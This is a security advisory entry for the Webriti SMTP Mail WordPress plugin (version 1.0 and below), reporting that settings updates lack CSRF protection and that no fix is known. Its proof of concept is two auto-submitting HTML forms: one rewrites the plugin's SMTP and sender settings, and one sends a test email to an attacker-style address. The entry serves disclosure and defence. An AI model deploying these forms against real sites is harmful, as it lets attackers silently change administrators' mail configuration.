WordPress Plugin Vulnerabilities

Webriti SMTP Mail <= 1.0 - Arbitrary Settings Update via CSRF

Description

The plugin does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack

Proof of Concept

<form id="test" action="https://example.com/wp-admin/options-general.php?page=webriti_smtpmail_panels#" method="POST">
    <input type="text" name="mail_from" value="hacke@example.com">
    <input type="text" name="mail_from_name" value="hacked">
    <input type="text" name="mailer" value="smtp">
    <input type="text" name="smtp_host" value="localhost">
    <input type="text" name="smtp_port" value="port">
    <input type="text" name="smtp_ssl" value="ssl">
    <input type="text" name="smtp_auth" value="true">
    <input type="text" name="smtp_user" value="">
    <input type="text" name="smtp_pass" value="">
    <input type="text" name="option_submit" value="Änderungen speichern">
</form>
<script>
    document.getElementById("test").submit();
</script>

<form id="test" action="https://example.com/wp-admin/options-general.php?page=webriti_smtpmail_panels#" method="POST">
    <input type="text" name="webrit_to" value="evil@example.com">
    <input type="text" name="webrit_test_action" value="Send Test">
</form>
<script>
    document.getElementById("test").submit();
</script>

Affects Plugins

No known fix

References

Classification

Miscellaneous

Original Researcher
Daniel Ruf
Submitter
Daniel Ruf
Submitter website
Verified
Yes

Timeline

Publicly Published
2022-05-18 (about 2 years ago)
Added
2022-05-18 (about 2 years ago)
Last Updated
2023-02-09 (about 1 years ago)

Other